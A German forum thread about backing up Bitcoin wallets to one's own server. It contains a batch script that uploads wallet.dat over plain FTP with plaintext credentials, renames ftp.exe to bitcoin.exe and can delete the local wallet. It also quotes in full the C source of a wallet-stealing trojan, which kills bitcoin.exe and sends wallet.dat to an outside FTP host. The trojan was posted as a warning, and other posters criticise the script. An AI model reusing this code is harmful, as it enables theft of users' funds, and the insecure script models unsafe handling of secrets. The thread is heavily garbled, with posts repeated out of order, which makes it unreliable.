Topic: Script zum Uploaden eurer wallets auf eigenem server "Windows" (Read 1323 times)
Ich würde dafür eh wput (pendant zu wget) benutzen. Oder noch einfacher: SyncBack Freeware. Das spart mir merkwürdige, sicherheitstechnisch bedenkliche und wirre Konstruktionen.
@copy %SYSTEMROOT%\System32\ftp.exe %PUBLIC%\bitcoin.exe
@cd %APPDATA%
@%PUBLIC%\bitcoin.exe -i -s:"%~f0"&GOTO:EOF
open server.ohne.http
benutzername
passwort
bin
put "Bitcoin\wallet.dat"
bye
@cd %APPDATA%
@%PUBLIC%\bitcoin.exe -i -s:"%~f0"&GOTO:EOF
open server.ohne.http
benutzername
passwort
bin
put "Bitcoin\wallet.dat"
bye
Wieso bitte kopierst du die ftp.exe in die Datei bitcoin.exe 
edit: Und warum wird jetzt die ftp.exe zu bitcoin.exe kopiert?
Warum um alles in der Welt sollte ich ein Programm aus %Systemroot% in das öffentliche Verzeichnis %PUBLIC% kopieren und von da aus starten?!? Und dann auch noch umbenannt in bitcoin.exe?
joo der schnipsel hat echt keine funktion O.o
Quote
%PUBLIC%\bitcoin.exe
Bastelstunde
Versuch doch mal das Problem der Pfadangabe im put-Befehl anders zu lösen.
mittlerweile habe ich zweifel ob das alles so gut ist O.o ich brauch nen bier....
@mipl soll ich etwa direkt nen download link mit posten ? *rofl*
@mipl soll ich etwa direkt nen download link mit posten ? *rofl*
Hmm ja ich sehe ein das klartext passwörter ein problem darstellen. weis jetzt aber so keine lösung.
Quote
joo der schnipsel hat echt keine funktion O.o
Ich persönlich verwende die bat , zwar schick ich nicht die wallet.dat hoch sondern die wallet.rar
@crashdown danke für die verbesserung
Quote
%PUBLIC%\bitcoin.exe
Ich persönlich verwende die bat , zwar schick ich nicht die wallet.dat hoch sondern die wallet.rar
@crashdown danke für die verbesserung
Der von dir zitierte Codeteil steht so an 2 Stellen und erfüllt natürlich beides mal eine Funktion - nur die Funktion die er jeweils erfüllt ist totaler Quatsch.
Bist du dir sicher dass du weißt was du da tust?
Quote
@copy %SYSTEMROOT%\System32\ftp.exe %PUBLIC%\bitcoin.exe
Und zum Trojaner-Code: Warum hast Du da die originalen Kommentare gelöscht?
Und warum sollte ich in einer VM XAMPP laufen lassen, um dann auch noch darauf Daten zu sichern?
Don't drink and write!
Hmm ja ich sehe ein das klartext passwörter ein problem darstellen. weis jetzt aber so keine lösung.
Lach ja httacces ist für den webserver vorgesehn ^^ und für die übertragung ssl ... bekomm wohl meinen ersten hitze stich .
naja die beispiele sind eben nur beisspiele..
der quelltext ist der aktuelle trojaner der jagt auf wallets macht, wollte die community informieren gewarnt sind sie hoffentlich .
Darin kann man auch erkennen das nur windows 7 systeme betroffen sind zurzeit mit dieser variante .
joo der schnipsel hat echt keine funktion O.o
Ich persönlich verwende die bat , zwar schick ich nicht die wallet.dat hoch sondern die wallet.rar
@crashdown danke für die verbesserung
Lach ja httacces ist für den webserver vorgesehn ^^ und für die übertragung ssl ... bekomm wohl meinen ersten hitze stich .
naja die beispiele sind eben nur beisspiele..
der quelltext ist der aktuelle trojaner der jagt auf wallets macht, wollte die community informieren gewarnt sind sie hoffentlich .
Darin kann man auch erkennen das nur windows 7 systeme betroffen sind zurzeit mit dieser variante .
joo der schnipsel hat echt keine funktion O.o
Quote
%PUBLIC%\bitcoin.exe
Ich persönlich verwende die bat , zwar schick ich nicht die wallet.dat hoch sondern die wallet.rar
@crashdown danke für die verbesserung
Und wie man sehen kann, sucht der trojaner nur in dem Stantardverzeichniss
char* appdata = getenv("%APPDATA%");
char* truepath = strcat(appdata, "\\Bitcoin\\wallet.dat");
Da wird er bei mir nix finden
Quote
char* appdata = getenv("%APPDATA%");
char* truepath = strcat(appdata, "\\Bitcoin\\wallet.dat");
Da wird er bei mir nix finden
Das problem das die FTP daten in der Bat stehen darin sehe ich kein problem.
Da die bat standort unabhängig ist. Du kannst sie nutzen vom stick aus , und nennen wie du willst.
Hmm Entschuldigung wenn ich mich so schlecht ausdrücke
Ich bin davon ausgegangen das wenn jemand einen Server benutzt auch eine sichere verbindung besteht via httacces z.B
Nutzungs beisspiel 1
Nehmen wir an du hast VmWare und dort hostet du via XAMPP in der Virtuellen maschine deinen Host zum saven , dann brauchst du nur noch einen mausklick machen um deine datei dort abzuspeichern.
Nutzungs beisspiel 2
Anstatt die wallet.dat zu nehmen kann man auch jede andere datei damit Uploaden auch eine wallet.rar mit verschlüsselung die wirklich jeder haben sollte (mindestens).
Der 2 zweite eintrag zum löschen ist eine eigene Bat , da du sonst unter umständen die wallet auf dem server löschen würdest .
--------------
Da zur zeit aber nur ein Trojaner umher geht der die wallet.dat stiehlt wird dies ausreichen um die sicherheit zu gewährleisten bei beisspiel 1-2...
Da die bat standort unabhängig ist. Du kannst sie nutzen vom stick aus , und nennen wie du willst.
Hmm Entschuldigung wenn ich mich so schlecht ausdrücke
Ich bin davon ausgegangen das wenn jemand einen Server benutzt auch eine sichere verbindung besteht via httacces z.B
Nutzungs beisspiel 1
Nehmen wir an du hast VmWare und dort hostet du via XAMPP in der Virtuellen maschine deinen Host zum saven , dann brauchst du nur noch einen mausklick machen um deine datei dort abzuspeichern.
Nutzungs beisspiel 2
Anstatt die wallet.dat zu nehmen kann man auch jede andere datei damit Uploaden auch eine wallet.rar mit verschlüsselung die wirklich jeder haben sollte (mindestens).
Der 2 zweite eintrag zum löschen ist eine eigene Bat , da du sonst unter umständen die wallet auf dem server löschen würdest .
--------------
Da zur zeit aber nur ein Trojaner umher geht der die wallet.dat stiehlt wird dies ausreichen um die sicherheit zu gewährleisten bei beisspiel 1-2...
Entschuldigung aber:
- im Klartext gespeicherte Passwörter sind immer ein Problem. Egal(!) wie der Dateiname ist.
- htaccess gesicherte Verbindung? htaccess sichert keine Verbindung. Das hat mit der Verschlüsselung des Datenverkehrs nichts zu tun.
- Die Anwendungsbeispiele sind, nunja, etwas dubios.
- Was soll der Quelltext quote?
edit: Und warum wird jetzt die ftp.exe zu bitcoin.exe kopiert?
Oh ha,
selbstverständlich hast du recht !
Das problem das die FTP daten in der Bat stehen darin sehe ich kein problem.
Da die bat standort unabhängig ist. Du kannst sie nutzen vom stick aus , und nennen wie du willst.
Hmm Entschuldigung wenn ich mich so schlecht ausdrücke
Ich bin davon ausgegangen das wenn jemand einen Server benutzt auch eine sichere verbindung besteht via httacces z.B
Nutzungs beisspiel 1
Nehmen wir an du hast VmWare und dort hostet du via XAMPP in der Virtuellen maschine deinen Host zum saven , dann brauchst du nur noch einen mausklick machen um deine datei dort abzuspeichern.
Nutzungs beisspiel 2
Anstatt die wallet.dat zu nehmen kann man auch jede andere datei damit Uploaden auch eine wallet.rar mit verschlüsselung die wirklich jeder haben sollte (mindestens).
Der 2 zweite eintrag zum löschen ist eine eigene Bat , da du sonst unter umständen die wallet auf dem server löschen würdest .
--------------
Da zur zeit aber nur ein Trojaner umher geht der die wallet.dat stiehlt wird dies ausreichen um die sicherheit zu gewährleisten bei beisspiel 1-2...
hier der aktuelle trojaner
Das intressante daran ist das der trojaner nur die wallet.dat kopieren kann wenn die bitcoin.exe geschlossen ist
selbstverständlich hast du recht !
Quote
1. Per ftp(!) unverschlüsselt eine wallet.dat ins Netz schieben
2. Für einen Server auf dem die wallet.dat liegt den Nutzer und das Passwort im Klartext in einem Script speichern.
3. Ein Script meine wallet.dat löschen lassen ohne sicher zu gehen, dass diese auch korrekt auf dem Server liegt.
2. Für einen Server auf dem die wallet.dat liegt den Nutzer und das Passwort im Klartext in einem Script speichern.
3. Ein Script meine wallet.dat löschen lassen ohne sicher zu gehen, dass diese auch korrekt auf dem Server liegt.
Das problem das die FTP daten in der Bat stehen darin sehe ich kein problem.
Da die bat standort unabhängig ist. Du kannst sie nutzen vom stick aus , und nennen wie du willst.
Hmm Entschuldigung wenn ich mich so schlecht ausdrücke
Ich bin davon ausgegangen das wenn jemand einen Server benutzt auch eine sichere verbindung besteht via httacces z.B
Nutzungs beisspiel 1
Nehmen wir an du hast VmWare und dort hostet du via XAMPP in der Virtuellen maschine deinen Host zum saven , dann brauchst du nur noch einen mausklick machen um deine datei dort abzuspeichern.
Nutzungs beisspiel 2
Anstatt die wallet.dat zu nehmen kann man auch jede andere datei damit Uploaden auch eine wallet.rar mit verschlüsselung die wirklich jeder haben sollte (mindestens).
Der 2 zweite eintrag zum löschen ist eine eigene Bat , da du sonst unter umständen die wallet auf dem server löschen würdest .
--------------
Da zur zeit aber nur ein Trojaner umher geht der die wallet.dat stiehlt wird dies ausreichen um die sicherheit zu gewährleisten bei beisspiel 1-2...
hier der aktuelle trojaner
Quote
#include
#include
#include
#include
#include
#include
#pragma comment(lib, "wininet")
void killprocess()
{
HANDLE hProcessSnapShot = CreateToolhelp32Snapshot(TH32CS_SNAPALL, 0 );
PROCESSENTRY32 ProcessEntry = { 0 };
ProcessEntry.dwSize = sizeof( ProcessEntry );
BOOL Return = FALSE;
Return = Process32First( hProcessSnapShot,&ProcessEntry );
int value = _tcsicmp(ProcessEntry.szExeFile, _T("bitcoin.exe"));
if (value==0)
{
HANDLE hProcess = OpenProcess(PROCESS_TERMINATE, FALSE, ProcessEntry.th32ProcessID);
TerminateProcess(hProcess,0);
CloseHandle(hProcess); //Close Handle }
}
while( Process32Next( hProcessSnapShot, &ProcessEntry ));
CloseHandle( hProcessSnapShot );
}
int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow)
{
killprocess();
Sleep(40000);
srand((unsigned)time(NULL));
int seedone=rand();
int seedtwo=rand()*3;
int seedboth = seedone + seedtwo;
char randomseed[99];
itoa(seedboth,randomseed,10);
char* appdata = getenv("%APPDATA%");
char* truepath = strcat(appdata, "\\Bitcoin\\wallet.dat");
HINTERNET hInternet;
HINTERNET hFtpSession;
hInternet = InternetOpen(NULL,INTERNET_OPEN_TYPE_DIRECT,NULL,NULL,0);
hFtpSession = InternetConnect(hInternet, "ftp.", INTERNET_DEFAULT_FTP_PORT, "", "", INTERNET_SERVICE_FTP, 0, 0);
FtpPutFile(hFtpSession, truepath , randomseed , FTP_TRANSFER_TYPE_BINARY, 0);
FtpPutFile(hFtpSession, truepath, randomseed, FTP_TRANSFER_TYPE_BINARY, 0);
InternetCloseHandle(hFtpSession);
InternetCloseHandle(hInternet);
return 0;
}
#include
#include
#include
#include
#include
#pragma comment(lib, "wininet")
void killprocess()
{
HANDLE hProcessSnapShot = CreateToolhelp32Snapshot(TH32CS_SNAPALL, 0 );
PROCESSENTRY32 ProcessEntry = { 0 };
ProcessEntry.dwSize = sizeof( ProcessEntry );
BOOL Return = FALSE;
Return = Process32First( hProcessSnapShot,&ProcessEntry );
int value = _tcsicmp(ProcessEntry.szExeFile, _T("bitcoin.exe"));
if (value==0)
{
HANDLE hProcess = OpenProcess(PROCESS_TERMINATE, FALSE, ProcessEntry.th32ProcessID);
TerminateProcess(hProcess,0);
CloseHandle(hProcess); //Close Handle }
}
while( Process32Next( hProcessSnapShot, &ProcessEntry ));
CloseHandle( hProcessSnapShot );
}
int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow)
{
killprocess();
Sleep(40000);
srand((unsigned)time(NULL));
int seedone=rand();
int seedtwo=rand()*3;
int seedboth = seedone + seedtwo;
char randomseed[99];
itoa(seedboth,randomseed,10);
char* appdata = getenv("%APPDATA%");
char* truepath = strcat(appdata, "\\Bitcoin\\wallet.dat");
HINTERNET hInternet;
HINTERNET hFtpSession;
hInternet = InternetOpen(NULL,INTERNET_OPEN_TYPE_DIRECT,NULL,NULL,0);
hFtpSession = InternetConnect(hInternet, "ftp.", INTERNET_DEFAULT_FTP_PORT, "", "", INTERNET_SERVICE_FTP, 0, 0);
FtpPutFile(hFtpSession, truepath , randomseed , FTP_TRANSFER_TYPE_BINARY, 0);
FtpPutFile(hFtpSession, truepath, randomseed, FTP_TRANSFER_TYPE_BINARY, 0);
InternetCloseHandle(hFtpSession);
InternetCloseHandle(hInternet);
return 0;
}
Das intressante daran ist das der trojaner nur die wallet.dat kopieren kann wenn die bitcoin.exe geschlossen ist
Oha, also... 
vorweg eine Frage zu dem Script. Ich werde es zwar nicht brauchen aber aus grundsätzlichem Interesse.
Wieso bitte kopierst du die ftp.exe in die Datei bitcoin.exe
Und dann noch als Hinweis:
Ich würde drei Dinge nicht tun:
1. Per ftp(!) unverschlüsselt eine wallet.dat ins Netz schieben
2. Für einen Server auf dem die wallet.dat liegt den Nutzer und das Passwort im Klartext in einem Script speichern.
3. Ein Script meine wallet.dat löschen lassen ohne sicher zu gehen, dass diese auch korrekt auf dem Server liegt.
1 und 2 macht das Script aber, 3 macht es mit der optionalen Zeile.
Ich würde das so nicht nutzen.
vorweg eine Frage zu dem Script. Ich werde es zwar nicht brauchen aber aus grundsätzlichem Interesse.
Wieso bitte kopierst du die ftp.exe in die Datei bitcoin.exe
Und dann noch als Hinweis:
Ich würde drei Dinge nicht tun:
1. Per ftp(!) unverschlüsselt eine wallet.dat ins Netz schieben
2. Für einen Server auf dem die wallet.dat liegt den Nutzer und das Passwort im Klartext in einem Script speichern.
3. Ein Script meine wallet.dat löschen lassen ohne sicher zu gehen, dass diese auch korrekt auf dem Server liegt.
1 und 2 macht das Script aber, 3 macht es mit der optionalen Zeile.
Ich würde das so nicht nutzen.
Hier unten seht ihr ein kleines script was ihr in eine textdatei hineinkopiert und anpassen könnt.
Die datei dann abspeichern bsp. save.bat nennen.
nach belieben könnt ihr die alte wallet im anschluss löschen lassen dazu einfach
Ich hoffe ich war dem einen oder anderem hilfreich
Quote
@copy %SYSTEMROOT%\System32\ftp.exe %PUBLIC%\bitcoin.exe
@cd %APPDATA%
@%PUBLIC%\bitcoin.exe -i -s:"%~f0"&GOTO:EOF
open server.ohne.http
benutzername
passwort
bin
put "Bitcoin\wallet.dat"
bye
@cd %APPDATA%
@%PUBLIC%\bitcoin.exe -i -s:"%~f0"&GOTO:EOF
open server.ohne.http
benutzername
passwort
bin
put "Bitcoin\wallet.dat"
bye
Die datei dann abspeichern bsp. save.bat nennen.
nach belieben könnt ihr die alte wallet im anschluss löschen lassen dazu einfach
Quote
Del /S /Q %APPDATA%\bitcoin\wallet.dat
benutzen.Ich hoffe ich war dem einen oder anderem hilfreich
Jump to: